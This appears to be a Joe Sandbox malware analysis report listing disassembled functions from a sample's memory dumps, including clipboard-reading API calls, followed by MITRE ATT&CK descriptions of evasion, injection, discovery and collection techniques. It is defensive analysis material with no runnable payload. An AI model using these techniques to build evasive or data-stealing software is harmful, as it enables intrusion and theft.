Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: 47e08afa25f8c443521b3f98b96117807d472874b889ee8d802212fcae14f4c2
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: BB11C233A051D40ED7178D3C8800579BFE31AA3136B5983DAF4FA9B2D2C7238D8A8750

Function 004299B0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d722c01a8bd2e68c804006294bc8a0889be745f601f03f4d9d5de63ddc943046
Instruction ID: 55029b9e38fdfb0df3b4b8151af6569af59bc0d0f5a25f3444c4cc7de86b0466
Opcode Fuzzy Hash: d722c01a8bd2e68c804006294bc8a0889be745f601f03f4d9d5de63ddc943046
Instruction Fuzzy Hash: E001B1F1B0035257DB209F55B4C1B27B2A86F95718F08443EE80867342DB7DFC44C2AA

Function 024D9C17 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: babb52ce3867e81688af6e2cbfc925ee92a6f3f8cd139ab93b6cbf9c46b7bedb
Instruction ID: ff892d0b8d7d21f3390a7fc5b4f07fe38c9a3b141e5ac308c77b7be685d96ae6
Opcode Fuzzy Hash: babb52ce3867e81688af6e2cbfc925ee92a6f3f8cd139ab93b6cbf9c46b7bedb
Instruction Fuzzy Hash: 7D017CF1701301C7E721AE5685E0B3BB2E96F91B14F18482ED91997300DB76E805DBB5

Function 024D55B3 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08b4345849cd0f47e80d1ed5c22eab79d945ad8a979d27bd12cd0f1252f48fec
Instruction ID: 176ce8685ce0c91e28110fc9c20b71915960fb9202d7ad495a3530c2dda5bf2a
Opcode Fuzzy Hash: 08b4345849cd0f47e80d1ed5c22eab79d945ad8a979d27bd12cd0f1252f48fec
Instruction Fuzzy Hash: ED11E2367583404BD718CF68D8E06BFB3E19B86301F89543EA482C3390CFB8C9068B46

Function 024E6C3B Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 358e2d3b4c42a0c731e3efba7596486553403020c12b89a5f8a1758b9ddfefcd
Instruction ID: e4bb2d07fa948237af78d3c75e9456a824778fad4cc8c63f59e38a54a11a5adc
Opcode Fuzzy Hash: 358e2d3b4c42a0c731e3efba7596486553403020c12b89a5f8a1758b9ddfefcd
Instruction Fuzzy Hash: 93112B756042005BFB109F25DD80E3BBBEAEBF6701F15943EE68157291DB3088929756

Function 0040E83B Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 009d4c94d368716b5c6a07810fd56c9ecea920436c5469bb2fcdecc493a6d2d4
Instruction ID: 78b4a12427cc173d586094b37f3e700b38d0ff2ce6b24877113fcbe6adf3e26f
Opcode Fuzzy Hash: 009d4c94d368716b5c6a07810fd56c9ecea920436c5469bb2fcdecc493a6d2d4
Instruction Fuzzy Hash: D71127717507404FD3189F25CCD2A637772ABC6314705893DB8519BBD3C67CAC0587A8

Function 0040BDC9 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9189c4c3175398eb84fc80681e1c6dfaa05d9782f835bdc2878a97ad02b88055
Instruction ID: 5bf83162093d809aa6a095f83f940cb60b386281fae2fad957a8694bd2eb5c71
Opcode Fuzzy Hash: 9189c4c3175398eb84fc80681e1c6dfaa05d9782f835bdc2878a97ad02b88055
Instruction Fuzzy Hash: 3911E071608341ABD7149F29DD9067FBBE2EBC2354F14AE2CE59253790C630C841CB4A

Function 024BEAA2 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 009d4c94d368716b5c6a07810fd56c9ecea920436c5469bb2fcdecc493a6d2d4
Instruction ID: 94b0ffe5c5de09ed0d34fdbcfaf8a4c8564e343a68d7ff63a2b759c8398b7a69
Opcode Fuzzy Hash: 009d4c94d368716b5c6a07810fd56c9ecea920436c5469bb2fcdecc493a6d2d4
Instruction Fuzzy Hash: 2611E7747407804FD7158F24CCD1EA27762AFC6318719863DA8419BB92C66CA805CB74

Function 024BC030 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9189c4c3175398eb84fc80681e1c6dfaa05d9782f835bdc2878a97ad02b88055
Instruction ID: 7c8c6f44d8ac874fe9e94b37f93394d48a66a68113cbb44a555a28107dda8bc5
Opcode Fuzzy Hash: 9189c4c3175398eb84fc80681e1c6dfaa05d9782f835bdc2878a97ad02b88055
Instruction Fuzzy Hash: 95119E71608341ABD7249F29DD9066BBBE2EBC2254F15AA2CE59653791C630C841CB0A

Function 024D70E4 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19ed9741b84afb298707877cb2535680f06aa68bf492e7e97af849109ca09354
Instruction ID: 46a50677c64c9fb1b1ea3bdf7da546c413940f4c871bb789cef2471a79fa519e
Opcode Fuzzy Hash: 19ed9741b84afb298707877cb2535680f06aa68bf492e7e97af849109ca09354
Instruction Fuzzy Hash: 2AF06DB5E0C3808BC719CF28C45066AFBE5AB9A700F10A93ED48AA3341DB31D545CB4A

Function 024D7797 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c062fd088646d19ef1d8bd4d71c411c976c3123481e9341e85681c4dc346f69
Instruction ID: 51dabb200b544594d9c3d072b9ba039e2d573e5a86a2ced4239f8bed968f9c71
Opcode Fuzzy Hash: 1c062fd088646d19ef1d8bd4d71c411c976c3123481e9341e85681c4dc346f69
Instruction Fuzzy Hash: A6F069B410D3929FC300DF29D29051BFFE0ABD5318F64EA5CE8DA5B212D334C5028B4A

Function 0042526A Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd5a1a9362cca19039c8d3fa2776169205ee0034e021f5660f97d99573220aa2
Instruction ID: 26823722f3a6afcc10447d79cbf8b06261be6e3c3bcefc34e32834821d37eed0
Opcode Fuzzy Hash: fd5a1a9362cca19039c8d3fa2776169205ee0034e021f5660f97d99573220aa2
Instruction Fuzzy Hash: D4F0EDB5A88301BAF6248A00DD43F67B6A89755B04F301519B344790E1E5E1F559870E

Function 024D54D1 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15be5673a4952075455a6c2d450438e7f22dd3e3a56e71dfeee11c81b82dc352
Instruction ID: fbc0fa3713e24fd1ba5f7463787dd3d8bcb5ae7c585028cd271d0fb0266fa81e
Opcode Fuzzy Hash: 15be5673a4952075455a6c2d450438e7f22dd3e3a56e71dfeee11c81b82dc352
Instruction Fuzzy Hash: 4CF0EDB1A88301BAF6248A01CC43F6BB6B8AB55B04F30151DB345790E0E5E1B5498B0E

Function 0043AAB2 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
Instruction ID: fe1efda9bcc16308283c5424634e62067ac2dc8fe4a9505e7820fcb65e305570
Opcode Fuzzy Hash: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
Instruction Fuzzy Hash: B1F0A735B456808BE704CF38D82155BBBE2E38B324F185A7DD681D3751D639C8018609

Function 024EAD19 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
Instruction ID: 9df8c0b848e02e7a67fb1fd9473e372f3e30d13aae029de02bc717b9641ed894
Opcode Fuzzy Hash: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
Instruction Fuzzy Hash: D6F0A735B456808BEB04CF38E82195FBBE2E387228F145A7DD641D3751DB39C4018605

Function 024D63B6 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7004a593075d1604d820592827f960a74d411a36b63cc4088cdb0a0f645b001a
Instruction ID: 7729fbb73fe16a6913590448f16c085d39d6ad3b1b16520e3f410e2ba771fcac
Opcode Fuzzy Hash: 7004a593075d1604d820592827f960a74d411a36b63cc4088cdb0a0f645b001a
Instruction Fuzzy Hash: 48D0972480C63AC30E290E1421301BEB72A0A03505B0F51E7DCF1BF282CBF2C8074A58

Function 024EC268 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39f376952ae625b8b9e581a4d9adace311e733e6b5fc1a80656dd2f6c93a6218
Instruction ID: 979b3066809f2b39c8d4e254b46c6f556eea9d2a5e27a8b6f776bea0b7d6dcb5
Opcode Fuzzy Hash: 39f376952ae625b8b9e581a4d9adace311e733e6b5fc1a80656dd2f6c93a6218
Instruction Fuzzy Hash: 1AB002759486418FC644DF18D584974F7F5AB0B211F1564549589E7222D220D8408A19

Function 024EC79B Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89a247458966beb6ee1323d7209a08a94252eab5608dc6956c606f04d9c1587d
Instruction ID: 10c72ce3a0ca8e08a8575cf423c81d1ec4165de9f21f41d416b206e48e332a4b
Opcode Fuzzy Hash: 89a247458966beb6ee1323d7209a08a94252eab5608dc6956c606f04d9c1587d
Instruction Fuzzy Hash: FDA00239E5C40197CA08CF20A854871E2BA6B5F204FA134288106B7C52D951D500854C

Function 024D559D Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbeba292ae877db911bd2f22180c16664a0dc2a699d78ed72cdc2ede8be8a5c3
Instruction ID: 70204a4f19da818e306c590333116dd845209fb171f96af6639338c1a50bb7b2
Opcode Fuzzy Hash: dbeba292ae877db911bd2f22180c16664a0dc2a699d78ed72cdc2ede8be8a5c3
Instruction Fuzzy Hash: 38B00254855145D6D704CF10D905575F270BF43705F10F655A40437160D3B4C248870E

Function 004310D0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 114clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 004310E0
GetWindowLongW.USER32 ref: 00431105
GetClipboardData.USER32 ref: 00431115
GlobalLock.KERNEL32 ref: 0043112E
GlobalUnlock.KERNEL32 ref: 00431240
CloseClipboard.USER32 ref: 00431249

Strings

(, xrefs: 004311BE
], xrefs: 00431191
j, xrefs: 004311AA
P, xrefs: 0043119B
x, xrefs: 0043117D
W, xrefs: 004311A5

Memory Dump Source

Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_8BB0.jbxd

Yara matches

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID: ($P$W$]$j$x
API String ID: 2832541153-1642767450
Opcode ID: 8b1f1a14f2ecd6cbcc61cef173fb78c483c4298edd8ed21dbcc155f4e5603572
Instruction ID: d10a51e23ecba45016217ad21913f42ff9d133ebe453f27826f30668db2baec2
Opcode Fuzzy Hash: 8b1f1a14f2ecd6cbcc61cef173fb78c483c4298edd8ed21dbcc155f4e5603572
Instruction Fuzzy Hash: B941A17050C7818ED301AFB8D88835FBEE0AB8A314F444A7EE4E9963D2D678854DC797

Function 024E1337 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 114clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 024E1347
GetWindowLongW.USER32 ref: 024E136C
GetClipboardData.USER32 ref: 024E137C
GlobalLock.KERNEL32 ref: 024E1395
GlobalUnlock.KERNEL32 ref: 024E14A7
CloseClipboard.USER32 ref: 024E14B0

Strings

W, xrefs: 024E140C
P, xrefs: 024E1402
j, xrefs: 024E1411
], xrefs: 024E13F8
x, xrefs: 024E13E4
(, xrefs: 024E1425

Memory Dump Source

Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd

Yara matches

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID: ($P$W$]$j$x
API String ID: 2832541153-1642767450
Opcode ID: b4901ee308e120f21ffea64ecbaed060110f6934b44995572f39dda3de49c7f5
Instruction ID: 77670fa70b7239dd6c969a02742a9b054482ade36e98dbb7d067dbac13b9bcf6
Opcode Fuzzy Hash: b4901ee308e120f21ffea64ecbaed060110f6934b44995572f39dda3de49c7f5
Instruction Fuzzy Hash: 1341807150C7818ED301EF7C998835FBEE09F86315F094A7EE4EA86392D6788549C7A3

Function 0042F83B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0042F845
VariantInit.OLEAUT32 ref: 0042F858

Strings

L, xrefs: 0042F8DA

Memory Dump Source

Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_8BB0.jbxd

Yara matches

Similarity

API ID: Variant$ClearInit
String ID: L
API String ID: 2610073882-2909332022
Opcode ID: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
Instruction ID: 6db3269f84c82bd33a71f1d72ed2fa7cb36160b769e4d9c9dbaa52e299ac7a35
Opcode Fuzzy Hash: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
Instruction Fuzzy Hash: 40413A7110CBC18ED321DB38844865EBFE16BE6220F588AADE5E5873E2D674854ACB53

Function 024DFAA2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 024DFAAC
VariantInit.OLEAUT32 ref: 024DFABF

Strings

L, xrefs: 024DFB41

Memory Dump Source

Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd

Yara matches

Similarity

API ID: Variant$ClearInit
String ID: L
API String ID: 2610073882-2909332022
Opcode ID: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
Instruction ID: 71a6db8cdb21138a0e3d9f8b2613aa4c196904c9dd3c12a9224bd777620ab77e
Opcode Fuzzy Hash: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
Instruction Fuzzy Hash: 2441297110CBC18ED331DB38845865EBFE1ABE6220F188A9DE5F5873E2D674854ACB53

Function 004322BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 004322EE
GetSystemMetrics.USER32 ref: 004322FD

Strings

, xrefs: 004323A8

Memory Dump Source

Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_8BB0.jbxd

Yara matches

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: c208063e004baaaa8ceb91fa553bdd71456cfb1a6ec307733573892fb2cdbb50
Instruction ID: c9a1f8c58fc854c7343cd62f2f50c2794f568aca7ada01e3bbf97962732916ca
Opcode Fuzzy Hash: c208063e004baaaa8ceb91fa553bdd71456cfb1a6ec307733573892fb2cdbb50
Instruction Fuzzy Hash: BB3183B09143048FDB40EF69E98965EBBF4BB88304F01853EE499DB360D7749948CF86

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

